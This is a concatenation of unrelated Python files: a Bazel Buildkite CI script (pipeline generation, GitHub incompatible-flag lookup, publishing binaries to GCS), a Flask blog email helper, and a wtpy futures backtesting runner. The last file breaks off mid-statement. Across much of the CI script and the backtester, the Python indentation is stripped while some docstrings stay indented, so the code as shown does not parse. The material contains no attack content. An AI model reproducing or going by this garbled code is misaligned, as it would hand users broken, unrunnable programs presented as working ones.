def filter_tasks_that_should_be_skipped(task_configs, pipeline_steps):
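    """
    Removes the tasks listed in the skip-tasks environment variable from task_configs and appends
    annotation steps to pipeline_steps describing what was (or could not be) skipped.
    """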
skip_tasks = get_skip_tasks()
if not skip_tasks:
return task_configs
actually_skipped = []
skip_tasks = set(skip_tasks)
for task in list(task_configs.keys()):
if task in skip_tasks:
actually_skipped.append(task)
del task_configs[task]
skip_tasks.remove(task)
if not task_configs:
raise BuildkiteException(
"Nothing to do since all tasks in the configuration should be skipped."
)
annotations = []
if actually_skipped:
annotations.append(
("info", "Skipping the following task(s): {}".format(", ".join(actually_skipped)))
)
if skip_tasks:
annotations.append(
(
"warning",
(
"The following tasks should have been skipped, "
"but were not part of the configuration: {}"
).format(", ".join(skip_tasks)),
)
)
if annotations:
print_skip_task_annotations(annotations, pipeline_steps)
return task_configs
def get_skip_tasks():
value = os.getenv(SKIP_TASKS_ENV_VAR, "")
return [v for v in value.split(",") if v]
def print_skip_task_annotations(annotations, pipeline_steps):
commands = [
"buildkite-agent annotate --style={} '{}' --context 'ctx-{}'".format(s, t, hash(t))
for s, t in annotations
]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about skipped tasks",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
def print_bazel_publish_binaries_pipeline(task_configs, http_config, file_config):
if not task_configs:
raise BuildkiteException("Bazel publish binaries pipeline configuration is empty.")
pipeline_steps = []
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
platforms = [get_platform_for_task(t, tc) for t, tc in task_configs.items()]
# These are the platforms that the bazel_publish_binaries.yml config is actually building.
configured_platforms = set(filter(should_publish_binaries_for_platform, platforms))
# These are the platforms that we want to build and publish according to this script.
expected_platforms = set(filter(should_publish_binaries_for_platform, PLATFORMS))
# We can skip this check if we're not on the main branch, because then we're probably
# building a one-off custom debugging binary anyway.
if current_branch_is_main_branch() and not expected_platforms.issubset(configured_platforms):
raise BuildkiteException(
"Bazel publish binaries pipeline needs to build Bazel for every commit on all publish_binary-enabled platforms."
)
# Build Bazel
for task, task_config in task_configs.items():
pipeline_steps.append(
bazel_build_step(
task,
get_platform_for_task(task, task_config),
"Bazel",
http_config,
file_config,
build_only=True,
)
)
pipeline_steps.append("wait")
# If all builds succeed, publish the Bazel binaries to GCS.
pipeline_steps.append(
create_step(
label="Publish Bazel Binaries",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"] + " bazelci.py publish_binaries",
],
platform=DEFAULT_PLATFORM,
)
)
print_pipeline_steps(pipeline_steps)
def should_publish_binaries_for_platform(platform):
if platform not in PLATFORMS:
raise BuildkiteException("Unknown platform '{}'".format(platform))
return PLATFORMS[platform]["publish_binary"]
def print_disabled_projects_info_box_step():
info_text = ["Downstream testing is disabled for the following projects :sadpanda:"]
for project, config in DOWNSTREAM_PROJECTS.items():
disabled_reason = config.get("disabled_reason", None)
if disabled_reason:
info_text.append("* **%s**: %s" % (project, disabled_reason))
if len(info_text) == 1:
return None
return create_step(
label=":sadpanda:",
commands=[
'buildkite-agent annotate --append --style=info "\n' + "\n".join(info_text) + '\n"'
],
platform=DEFAULT_PLATFORM,
)
def print_incompatible_flags_info_box_step(incompatible_flags_map):
info_text = ["Build and test with the following incompatible flags:"]
for flag in incompatible_flags_map:
info_text.append("* **%s**: %s" % (flag, incompatible_flags_map[flag]))
if len(info_text) == 1:
return None
return create_step(
label="Incompatible flags info",
commands=[
'buildkite-agent annotate --append --style=info "\n' + "\n".join(info_text) + '\n"'
],
platform=DEFAULT_PLATFORM,
)
def fetch_incompatible_flags():
"""
Return a list of incompatible flags to be tested in downstream with the current release Bazel
"""
incompatible_flags = {}
# If INCOMPATIBLE_FLAGS environment variable is set, we get incompatible flags from it.
if "INCOMPATIBLE_FLAGS" in os.environ:
for flag in os.environ["INCOMPATIBLE_FLAGS"].split():
# We are not able to get the github link for this flag from INCOMPATIBLE_FLAGS,
# so just assign the url to empty string.
incompatible_flags[flag] = ""
return incompatible_flags
output = subprocess.check_output(
[
"curl",
"https://api.github.com/search/issues?per_page=100&q=repo:bazelbuild/bazel+label:incompatible-change+state:open"
]
).decode("utf-8")
issue_info = json.loads(output)
for issue in issue_info["items"]:
# Every incompatible flags issue should start with "<incompatible flag name (without --)>:"
name = "--" + issue["title"].split(":")[0]
url = issue["html_url"]
if name.startswith("--incompatible_"):
incompatible_flags[name] = url
else:
eprint(
f"{name} is not recognized as an incompatible flag, please modify the issue title "
f'of {url} to "<incompatible flag name (without --)>:..."'
)
return incompatible_flags
def print_bazel_downstream_pipeline(
task_configs, http_config, file_config, test_incompatible_flags, test_disabled_projects, notify
):
if not task_configs:
raise BuildkiteException("Bazel downstream pipeline configuration is empty.")
pipeline_steps = []
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
pipeline_steps = []
info_box_step = print_disabled_projects_info_box_step()
if info_box_step is not None:
pipeline_steps.append(info_box_step)
if not test_incompatible_flags:
for task, task_config in task_configs.items():
pipeline_steps.append(
bazel_build_step(
task,
get_platform_for_task(task, task_config),
"Bazel",
http_config,
file_config,
build_only=True,
)
)
pipeline_steps.append("wait")
incompatible_flags = None
if test_incompatible_flags:
incompatible_flags_map = fetch_incompatible_flags()
if not incompatible_flags_map:
step = create_step(
label="No Incompatible flags info",
commands=[
'buildkite-agent annotate --style=error "No incompatible flag issue is found on github for current version of Bazel." --context "noinc"'
],
platform=DEFAULT_PLATFORM,
)
pipeline_steps.append(step)
print_pipeline_steps(pipeline_steps)
return
info_box_step = print_incompatible_flags_info_box_step(incompatible_flags_map)
if info_box_step is not None:
pipeline_steps.append(info_box_step)
incompatible_flags = list(incompatible_flags_map.keys())
pipeline_steps.append(create_step(
label="Print skipped tasks annotation",
commands=['buildkite-agent annotate --style=info "The following tasks were skipped since they require specific Bazel versions:\n" --context "ctx-skipped_due_to_bazel_version"'],
platform=DEFAULT_PLATFORM))
for project, config in DOWNSTREAM_PROJECTS.items():
disabled_reason = config.get("disabled_reason", None)
# If test_disabled_projects is true, we add configs for disabled projects.
# If test_disabled_projects is false, we add configs for not disabled projects.
if (test_disabled_projects and disabled_reason) or (
not test_disabled_projects and not disabled_reason
):
pipeline_steps.append(
upload_project_pipeline_step(
project_name=project,
git_repository=config["git_repository"],
http_config=config.get("http_config", None),
file_config=config.get("file_config", None),
incompatible_flags=incompatible_flags,
)
)
pipeline_steps.append(create_step(
label="Remove skipped tasks annotation if unneeded",
commands=['buildkite-agent meta-data exists "has-skipped-steps" || buildkite-agent annotation remove --context "ctx-skipped_due_to_bazel_version"'],
platform=DEFAULT_PLATFORM))
if test_incompatible_flags:
current_build_number = os.environ.get("BUILDKITE_BUILD_NUMBER", None)
if not current_build_number:
raise BuildkiteException("Not running inside Buildkite")
if use_bazelisk_migrate():
pipeline_steps += get_steps_for_aggregating_migration_results(
current_build_number, notify
)
else:
pipeline_steps.append({"wait": "~", "continue_on_failure": "true"})
pipeline_steps.append(
create_step(
label="Test failing jobs with incompatible flag separately",
commands=[
fetch_bazelcipy_command(),
fetch_incompatible_flag_verbose_failures_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " incompatible_flag_verbose_failures.py --build_number=%s | buildkite-agent pipeline upload"
% current_build_number,
],
platform=DEFAULT_PLATFORM,
)
)
if (
not test_disabled_projects
and not test_incompatible_flags
and current_branch_is_main_branch()
):
# Only update the last green downstream commit in the regular Bazel@HEAD + Downstream pipeline.
pipeline_steps.append("wait")
pipeline_steps.append(
create_step(
label="Try Update Last Green Downstream Commit",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " bazelci.py try_update_last_green_downstream_commit",
],
platform=DEFAULT_PLATFORM,
)
)
print_pipeline_steps(pipeline_steps)
def get_steps_for_aggregating_migration_results(current_build_number, notify):
parts = [
PLATFORMS[DEFAULT_PLATFORM]["python"],
"aggregate_incompatible_flags_test_result.py",
"--build_number=%s" % current_build_number,
]
if notify:
parts.append("--notify")
return [
{"wait": "~", "continue_on_failure": "true"},
create_step(
label="Aggregate incompatible flags test result",
commands=[
fetch_bazelcipy_command(),
fetch_aggregate_incompatible_flags_test_result_command(),
" ".join(parts),
],
platform=DEFAULT_PLATFORM,
),
]
def bazelci_builds_download_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "https://storage.googleapis.com/{}/artifacts/{}/{}/bazel".format(
bucket_name, platform, git_commit
)
def bazelci_builds_nojdk_download_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "https://storage.googleapis.com/{}/artifacts/{}/{}/bazel_nojdk".format(
bucket_name, platform, git_commit
)
def bazelci_builds_gs_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/artifacts/{}/{}/bazel".format(bucket_name, platform, git_commit)
def bazelci_builds_nojdk_gs_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/artifacts/{}/{}/bazel_nojdk".format(bucket_name, platform, git_commit)
def bazelci_latest_build_metadata_url():
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/metadata/latest.json".format(bucket_name)
def bazelci_builds_metadata_url(git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/metadata/{}.json".format(bucket_name, git_commit)
def bazelci_last_green_commit_url(git_repository, pipeline_slug):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-untrusted-builds"
return "gs://{}/last_green_commit/{}/{}".format(
bucket_name, git_repository[len("https://") :], pipeline_slug
)
def bazelci_last_green_downstream_commit_url():
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-untrusted-builds"
return "gs://{}/last_green_commit/downstream_pipeline".format(bucket_name)
def get_last_green_commit(last_green_commit_url):
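    """Reads the last green commit from GCS; returns None if it cannot be read (e.g. it does not exist yet)."""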
try:
return (
subprocess.check_output(
[gsutil_command(), "cat", last_green_commit_url], env=os.environ
)
.decode("utf-8")
.strip()
)
except subprocess.CalledProcessError:
return None
def try_update_last_green_commit():
org_slug = os.getenv("BUILDKITE_ORGANIZATION_SLUG")
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
current_job_id = os.getenv("BUILDKITE_JOB_ID")
client = BuildkiteClient(org=org_slug, pipeline=pipeline_slug)
build_info = client.get_build_info(build_number)
    # Find failing steps, ignoring Buildifier and steps with soft_fail enabled, before trying to update the last green commit.
def has_failed(job):
state = job.get("state")
# Ignore steps that don't have a state (like "wait").
return (
state is not None
and state != "passed"
and not job.get("soft_failed")
and job["id"] != current_job_id
and job["name"] != BUILDIFIER_STEP_NAME
)
failing_jobs = [j["name"] for j in build_info["jobs"] if has_failed(j)]
if failing_jobs:
raise BuildkiteException(
"Cannot update last green commit due to {} failing step(s): {}".format(
len(failing_jobs), ", ".join(failing_jobs)
)
)
git_repository = os.getenv("BUILDKITE_REPO")
last_green_commit_url = bazelci_last_green_commit_url(git_repository, pipeline_slug)
update_last_green_commit_if_newer(last_green_commit_url)
def update_last_green_commit_if_newer(last_green_commit_url):
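    """
    Writes the current HEAD commit to the given GCS location, but only if it is newer than the
    stored last green commit (or if no last green commit exists yet).
    """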
last_green_commit = get_last_green_commit(last_green_commit_url)
current_commit = subprocess.check_output(["git", "rev-parse", "HEAD"]).decode("utf-8").strip()
if last_green_commit:
success = False
try:
execute_command(["git", "fetch", "-v", "origin", last_green_commit])
success = True
except subprocess.CalledProcessError:
# If there was an error fetching the commit it typically means
# that the commit does not exist anymore - due to a force push. In
# order to recover from that assume that the current commit is the
# newest commit.
result = [current_commit]
finally:
if success:
result = (
subprocess.check_output(
["git", "rev-list", "%s..%s" % (last_green_commit, current_commit)]
)
.decode("utf-8")
.strip()
)
else:
result = None
    # If current_commit is newer than last_green_commit, `git rev-list A..B` will output a bunch of
    # commits, otherwise the output should be empty.
if not last_green_commit or result:
execute_command(
[
"echo %s | %s -h 'Cache-Control: no-store' cp - %s"
% (current_commit, gsutil_command(), last_green_commit_url)
],
shell=True,
)
else:
eprint(
"Updating abandoned: last green commit (%s) is not older than current commit (%s)."
% (last_green_commit, current_commit)
)
def try_update_last_green_downstream_commit():
last_green_commit_url = bazelci_last_green_downstream_commit_url()
update_last_green_commit_if_newer(last_green_commit_url)
def latest_generation_and_build_number():
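    """
    Reads the latest build metadata from GCS and returns its object generation together with the
    recorded build number, retrying a few times if the content hash does not match (i.e. the file
    was modified concurrently).
    """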
generation = None
output = None
for attempt in range(5):
output = subprocess.check_output(
[gsutil_command(), "stat", bazelci_latest_build_metadata_url()], env=os.environ
)
match = re.search("Generation:[ ]*([0-9]+)", output.decode("utf-8"))
if not match:
raise BuildkiteException("Couldn't parse generation. gsutil output format changed?")
generation = match.group(1)
match = re.search(r"Hash \(md5\):[ ]*([^\s]+)", output.decode("utf-8"))
if not match:
raise BuildkiteException("Couldn't parse md5 hash. gsutil output format changed?")
expected_md5hash = base64.b64decode(match.group(1))
output = subprocess.check_output(
[gsutil_command(), "cat", bazelci_latest_build_metadata_url()], env=os.environ
)
hasher = hashlib.md5()
hasher.update(output)
actual_md5hash = hasher.digest()
if expected_md5hash == actual_md5hash:
break
info = json.loads(output.decode("utf-8"))
return generation, info["build_number"]
def sha256_hexdigest(filename):
sha256 = hashlib.sha256()
with open(filename, "rb") as f:
for block in iter(lambda: f.read(65536), b""):
sha256.update(block)
return sha256.hexdigest()
def upload_bazel_binaries():
"""
Uploads all Bazel binaries to a deterministic URL based on the current Git commit.
Returns maps of platform names to sha256 hashes of the corresponding bazel and bazel_nojdk binaries.
"""
bazel_hashes = {}
bazel_nojdk_hashes = {}
for platform_name, platform in PLATFORMS.items():
if not should_publish_binaries_for_platform(platform_name):
continue
tmpdir = tempfile.mkdtemp()
try:
bazel_binary_path = download_bazel_binary(tmpdir, platform_name)
# One platform that we build on can generate binaries for multiple platforms, e.g.
# the centos7 platform generates binaries for the "centos7" platform, but also
# for the generic "linux" platform.
for target_platform_name in platform["publish_binary"]:
execute_command(
[
gsutil_command(),
"cp",
bazel_binary_path,
bazelci_builds_gs_url(target_platform_name, os.environ["BUILDKITE_COMMIT"]),
]
)
bazel_hashes[target_platform_name] = sha256_hexdigest(bazel_binary_path)
# Also publish bazel_nojdk binaries.
bazel_nojdk_binary_path = download_bazel_nojdk_binary(tmpdir, platform_name)
for target_platform_name in platform["publish_binary"]:
execute_command(
[
gsutil_command(),
"cp",
bazel_nojdk_binary_path,
bazelci_builds_nojdk_gs_url(
target_platform_name, os.environ["BUILDKITE_COMMIT"]
),
]
)
bazel_nojdk_hashes[target_platform_name] = sha256_hexdigest(bazel_nojdk_binary_path)
except subprocess.CalledProcessError as e:
            # If we're not on the main branch, we're probably building a custom one-off binary,
            # so ignore failures for individual platforms (it's possible that we didn't build
            # binaries for all platforms).
if not current_branch_is_main_branch():
eprint(
"Ignoring failure to download and publish Bazel binary for platform {}: {}".format(
platform_name, e
)
)
else:
raise e
finally:
shutil.rmtree(tmpdir)
return bazel_hashes, bazel_nojdk_hashes
def try_publish_binaries(bazel_hashes, bazel_nojdk_hashes, build_number, expected_generation):
"""
Uploads the info.json file that contains information about the latest Bazel commit that was
successfully built on CI.
"""
now = datetime.datetime.now()
git_commit = os.environ["BUILDKITE_COMMIT"]
info = {
"build_number": build_number,
"build_time": now.strftime("%d-%m-%Y %H:%M"),
"git_commit": git_commit,
"platforms": {},
}
for platform, sha256 in bazel_hashes.items():
info["platforms"][platform] = {
"url": bazelci_builds_download_url(platform, git_commit),
"sha256": sha256,
"nojdk_url": bazelci_builds_nojdk_download_url(platform, git_commit),
"nojdk_sha256": bazel_nojdk_hashes[platform],
}
tmpdir = tempfile.mkdtemp()
try:
info_file = os.path.join(tmpdir, "info.json")
with open(info_file, mode="w", encoding="utf-8") as fp:
json.dump(info, fp, indent=2, sort_keys=True)
try:
execute_command(
[
gsutil_command(),
"-h",
"x-goog-if-generation-match:" + expected_generation,
"-h",
"Content-Type:application/json",
"cp",
info_file,
bazelci_latest_build_metadata_url(),
]
)
except subprocess.CalledProcessError:
raise BinaryUploadRaceException()
execute_command(
[
gsutil_command(),
"cp",
bazelci_latest_build_metadata_url(),
bazelci_builds_metadata_url(git_commit),
]
)
finally:
shutil.rmtree(tmpdir)
def publish_binaries():
"""
Publish Bazel binaries to GCS.
"""
current_build_number = os.environ.get("BUILDKITE_BUILD_NUMBER", None)
if not current_build_number:
raise BuildkiteException("Not running inside Buildkite")
current_build_number = int(current_build_number)
# Upload the Bazel binaries for this commit.
bazel_hashes, bazel_nojdk_hashes = upload_bazel_binaries()
# Try to update the info.json with data about our build. This will fail (expectedly) if we're
# not the latest build. Only do this if we're building binaries from the main branch to avoid
# accidentally publishing a custom debug build as the "latest" Bazel binary.
if current_branch_is_main_branch():
for _ in range(5):
latest_generation, latest_build_number = latest_generation_and_build_number()
if current_build_number <= latest_build_number:
eprint(
(
"Current build '{0}' is not newer than latest published '{1}'. "
+ "Skipping publishing of binaries."
).format(current_build_number, latest_build_number)
)
break
try:
try_publish_binaries(
bazel_hashes, bazel_nojdk_hashes, current_build_number, latest_generation
)
except BinaryUploadRaceException:
# Retry.
continue
eprint(
"Successfully updated '{0}' to binaries from build {1}.".format(
bazelci_latest_build_metadata_url(), current_build_number
)
)
break
else:
raise BuildkiteException("Could not publish binaries, ran out of attempts.")
# This is so that multiline python strings are represented as YAML
# block strings.
def str_presenter(dumper, data):
if len(data.splitlines()) > 1: # check for multiline string
return dumper.represent_scalar("tag:yaml.org,2002:str", data, style="|")
return dumper.represent_scalar("tag:yaml.org,2002:str", data)
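# Illustrative sketch (not part of the original script): once the presenter
# above is registered, multi-line strings dump as YAML block scalars. Assumes
# PyYAML is imported at the top of this script, as main() below relies on it;
# the helper name is hypothetical.
def _yaml_block_scalar_demo():
    yaml.add_representer(str, str_presenter)
    # Dumps roughly as:
    #   commands: |
    #     echo hello
    #     echo world
    return yaml.dump({"commands": "echo hello\necho world\n"})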
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
yaml.add_representer(str, str_presenter)
parser = argparse.ArgumentParser(description="Bazel Continuous Integration Script")
parser.add_argument("--script", type=str)
subparsers = parser.add_subparsers(dest="subparsers_name")
bazel_publish_binaries_pipeline = subparsers.add_parser("bazel_publish_binaries_pipeline")
bazel_publish_binaries_pipeline.add_argument("--file_config", type=str)
bazel_publish_binaries_pipeline.add_argument("--http_config", type=str)
bazel_publish_binaries_pipeline.add_argument("--git_repository", type=str)
bazel_downstream_pipeline = subparsers.add_parser("bazel_downstream_pipeline")
bazel_downstream_pipeline.add_argument("--file_config", type=str)
bazel_downstream_pipeline.add_argument("--http_config", type=str)
bazel_downstream_pipeline.add_argument("--git_repository", type=str)
bazel_downstream_pipeline.add_argument(
"--test_incompatible_flags", type=bool, nargs="?", const=True
)
bazel_downstream_pipeline.add_argument(
"--test_disabled_projects", type=bool, nargs="?", const=True
)
bazel_downstream_pipeline.add_argument("--notify", type=bool, nargs="?", const=True)
project_pipeline = subparsers.add_parser("project_pipeline")
project_pipeline.add_argument("--project_name", type=str)
project_pipeline.add_argument("--file_config", type=str)
project_pipeline.add_argument("--http_config", type=str)
project_pipeline.add_argument("--git_repository", type=str)
project_pipeline.add_argument("--monitor_flaky_tests", type=bool, nargs="?", const=True)
project_pipeline.add_argument("--use_but", type=bool, nargs="?", const=True)
project_pipeline.add_argument("--incompatible_flag", type=str, action="append")
project_pipeline.add_argument("--notify", type=bool, nargs="?", const=True)
runner = subparsers.add_parser("runner")
runner.add_argument("--task", action="store", type=str, default="")
runner.add_argument("--file_config", type=str)
runner.add_argument("--http_config", type=str)
runner.add_argument("--git_repository", type=str)
runner.add_argument(
"--git_commit", type=str, help="Reset the git repository to this commit after cloning it"
)
runner.add_argument(
"--repo_location",
type=str,
help="Use an existing repository instead of cloning from github",
)
runner.add_argument(
"--use_bazel_at_commit", type=str, help="Use Bazel binary built at a specific commit"
)
runner.add_argument("--use_but", type=bool, nargs="?", const=True)
runner.add_argument("--save_but", type=bool, nargs="?", const=True)
runner.add_argument("--needs_clean", type=bool, nargs="?", const=True)
runner.add_argument("--build_only", type=bool, nargs="?", const=True)
runner.add_argument("--test_only", type=bool, nargs="?", const=True)
runner.add_argument("--monitor_flaky_tests", type=bool, nargs="?", const=True)
runner.add_argument("--incompatible_flag", type=str, action="append")
subparsers.add_parser("publish_binaries")
subparsers.add_parser("try_update_last_green_commit")
subparsers.add_parser("try_update_last_green_downstream_commit")
args = parser.parse_args(argv)
if args.script:
global SCRIPT_URL
SCRIPT_URL = args.script
try:
if args.subparsers_name == "bazel_publish_binaries_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_bazel_publish_binaries_pipeline(
task_configs=configs.get("tasks", None),
http_config=args.http_config,
file_config=args.file_config,
)
elif args.subparsers_name == "bazel_downstream_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_bazel_downstream_pipeline(
task_configs=configs.get("tasks", None),
http_config=args.http_config,
file_config=args.file_config,
test_incompatible_flags=args.test_incompatible_flags,
test_disabled_projects=args.test_disabled_projects,
notify=args.notify,
)
elif args.subparsers_name == "project_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_project_pipeline(
configs=configs,
project_name=args.project_name,
http_config=args.http_config,
file_config=args.file_config,
git_repository=args.git_repository,
monitor_flaky_tests=args.monitor_flaky_tests,
use_but=args.use_but,
incompatible_flags=args.incompatible_flag,
notify=args.notify,
)
elif args.subparsers_name == "runner":
configs = fetch_configs(args.http_config, args.file_config)
tasks = configs.get("tasks", {})
task_config = tasks.get(args.task)
if not task_config:
raise BuildkiteException(
"No such task '{}' in configuration. Available: {}".format(
args.task, ", ".join(tasks)
)
)
platform = get_platform_for_task(args.task, task_config)
            # The value of `BUILDKITE_MESSAGE` defaults to the commit message, which can be too
            # large on Windows, so we truncate the value to 1000 characters.
            # See https://github.com/bazelbuild/continuous-integration/issues/1218
if "BUILDKITE_MESSAGE" in os.environ:
os.environ["BUILDKITE_MESSAGE"] = os.environ["BUILDKITE_MESSAGE"][:1000]
execute_commands(
task_config=task_config,
platform=platform,
git_repository=args.git_repository,
git_commit=args.git_commit,
repo_location=args.repo_location,
use_bazel_at_commit=args.use_bazel_at_commit,
use_but=args.use_but,
save_but=args.save_but,
needs_clean=args.needs_clean,
build_only=args.build_only,
test_only=args.test_only,
monitor_flaky_tests=args.monitor_flaky_tests,
incompatible_flags=args.incompatible_flag,
bazel_version=task_config.get("bazel") or configs.get("bazel"),
)
elif args.subparsers_name == "publish_binaries":
publish_binaries()
elif args.subparsers_name == "try_update_last_green_commit":
# Update the last green commit of a project pipeline
try_update_last_green_commit()
elif args.subparsers_name == "try_update_last_green_downstream_commit":
# Update the last green commit of the downstream pipeline
try_update_last_green_downstream_commit()
else:
parser.print_help()
return 2
except BuildkiteException as e:
eprint(str(e))
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
|
emails.py
|
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from bluelog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(subject, to, html):
app = current_app._get_current_object()
message = Message(subject, recipients=[to], html=html)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_new_comment_email(post):
post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments'
send_mail(subject='New comment', to=current_app.config['BLUELOG_EMAIL'],
              html='<p>New comment in post <i>%s</i>, click the link below to check:</p>'
'<p><a href="%s">%s</a></p>'
                   '<p><small style="color: #868e96">Do not reply to this email.</small></p>'
% (post.title, post_url, post_url))
def send_new_reply_email(comment):
post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments'
send_mail(subject='New reply', to=comment.email,
html='<p>New reply for the comment you left in post <i>%s</i>, click the link below to check: </p>'
'<p><a href="%s">%s</a></p>'
                   '<p><small style="color: #868e96">Do not reply to this email.</small></p>'
% (comment.post.title, post_url, post_url))
|
runBT_multiple.py
|
import sys
import os
dirpath_base = "C:\\Users\\zhouyou\\Documents\\BaiduNetdiskWorkspace\\GitHub\\"
print(dirpath_base)
sys.path.append(os.path.join(dirpath_base, 'wtpy'))
from wtpy import WtBtEngine, EngineType
#from strategies.HftStraDemo import HftStraDemo, myTestHftStrat, myTestHftArbitrageStrat, mySimpleArbitrageStrategy
from strategies.Hft_simpleExecution import mySimpleArbitrageStrategy
from wtpy.apps import WtBtAnalyst
import pandas as pd
from datetime import datetime
import multiprocessing
import time
import threading
s_dir_thisfile = os.path.dirname(os.path.realpath(__file__))
class WtMultipleBacktest:
    '''
    Helper for running multiple backtests within a single run; needed because the underlying engine is a singleton.\n
    '''
def __init__(self, worker_num:int = 8):
        '''
        Constructor\n
        @worker_num number of worker processes, 8 by default; can be set according to the number of CPU cores
        '''
self.worker_num = worker_num
self.running_worker = 0
self.mutable_params = dict()
self.fixed_params = dict()
self.env_params = dict()
self.cpp_stra_module = None
return
def __gen_tasks__(self, counter:int,):
        '''
        Generate the backtest tasks
        '''
int_start = 201812240859
        # Build the final parameter dict for each group
param_groups = list()
int_end = 0
for i_count in range(counter+1):
print("redo")
print(s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(i_count)+".csv")
print(int_start, int_end)
print("done")
thisGrp = dict()
thisGrp['i_count'] = i_count
df_tradelist = pd.read_csv(s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(i_count)+".csv", index_col=0)
thisGrp['int_start'] = int_start = int(format(datetime.strptime(df_tradelist.index[0],"%Y-%m-%d %H:%M:%S"),'%Y%m%d%H%M'))
s_date = df_tradelist.loc[df_tradelist.index[-1],'tradingDate']
thisGrp['int_end'] = int_end = int(format(datetime.strptime(s_date + ' 15:00',"%Y-%m-%d %H:%M"),'%Y%m%d%H%M'))
print(thisGrp)
thisGrp['contract_1'] = df_tradelist.loc[df_tradelist.index[0],'contract_1']
thisGrp['contract_2'] = df_tradelist.loc[df_tradelist.index[0],'contract_2']
param_groups.append(thisGrp)
return param_groups
def __start_task__(self, params:dict):
        '''
        Start a single backtest task\n
        The subprocess is launched from a thread so that the total number of worker processes can be capped\n
        The thread joins the subprocess and only then updates the running_worker counter\n
        Updating running_worker inside __execute_task__ would not work, because it runs in a different process and the data is not shared\n
        @params parameters as a key-value dict
        '''
p = multiprocessing.Process(target=self.__execute_task__, args=(params,))
p.start()
p.join()
self.running_worker -= 1
print("工作进程%d个" % (self.running_worker))
def __execute_task__(self, params:dict):
        '''
        Execute a single backtest task\n
        @params parameters as a key-value dict
        '''
i_count = params['i_count']
int_start = params['int_start']
int_end = params['int_end']
contract_1 = params['contract_1']
contract_2 = params['contract_2']
        # Create a backtest environment and attach the strategy
engine = WtBtEngine(EngineType.ET_HFT)
engine.init(s_dir_thisfile + '\\common\\', s_dir_thisfile + "\\configbt_2.json")
engine.configBacktest(int_start, int_end)
engine.configBTStorage(mode="csv", path="C:/Users/zhouyou/Documents/BaiduNetdiskWorkspace/futuredata/SP/tick/")
engine.commitBTConfig()
s_name = 'hft_sp_2contracts_multiple_' + str(i_count)
straInfo = mySimpleArbitrageStrategy(name=s_name,
code1="SHFE.sp."+contract_1[2:],
code2="SHFE.sp."+contract_2[2:],
expsecs=20,
offset=0,
file_tradelist = s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(i_count)+".csv",
tradingHorizonMin= 10,
slotsTotal= 2,
slotsEachTime= 1,
coldSeconds= 20,
addtick_open= 2,
addtick_close= 10,
freq=10,
sizeofbet=10)
engine.set_hft_strategy(straInfo)
engine.run_backtest()
engine.release_backtest()
def go(self, counter:int, interval:float = 0.2):
        '''
        Start all backtest tasks\n
        @counter  index of the last trade-list file to back-test (tasks 0..counter are run)
        @interval polling interval in seconds
        '''
self.tasks = self.__gen_tasks__(counter)
self.running_worker = 0
total_task = len(self.tasks)
left_task = total_task
while True:
if left_task == 0:
break
if self.running_worker < self.worker_num:
params = self.tasks[total_task-left_task]
left_task -= 1
print("剩余任务%d个" % (left_task))
p = threading.Thread(target=self.__start_task__, args=(params,))
p.start()
self.running_worker += 1
print("工作进程%d个" % (self.running_worker))
else:
time.sleep(interval)
        # Finally, once all tasks have been started, wait for every worker process to finish
while True:
if self.running_worker == 0:
break
else:
time.sleep(interval)
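# Illustrative sketch (not part of the original script): the scheduling pattern
# described in the docstrings above, reduced to a standalone function. Each task
# runs in its own process; a thread joins that process so the parent can track
# how many workers are still busy and cap the total. All names are hypothetical.
def _run_tasks_with_worker_cap(tasks, work_fn, worker_num=8, interval=0.2):
    state = {"running": 0}

    def start_one(params):
        p = multiprocessing.Process(target=work_fn, args=(params,))
        p.start()
        p.join()  # joining inside a thread keeps the dispatch loop responsive
        state["running"] -= 1

    pending = list(tasks)
    threads = []
    while pending:
        if state["running"] < worker_num:
            t = threading.Thread(target=start_one, args=(pending.pop(0),))
            t.start()
            threads.append(t)
            state["running"] += 1
        else:
            time.sleep(interval)
    for t in threads:
        t.join()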
if __name__ == "__main__":
df_tradelist_full = pd.read_csv(s_dir_thisfile + "\\test.csv", index_col=0)
i_begin = 0
counter = 0
if not os.path.isdir(s_dir_thisfile + "\\tradelists_backtest\\"):
os.mkdir(s_dir_thisfile + "\\tradelists_backtest\\")
for i_row in range(1,df_tradelist_full.shape[0]):
s_index = df_tradelist_full.index[i_row]
s_lastindex = df_tradelist_full.index[i_row-1]
if df_tradelist_full.loc[s_index, 'contract_1'] != df_tradelist_full.loc[s_lastindex, 'contract_1'] or \
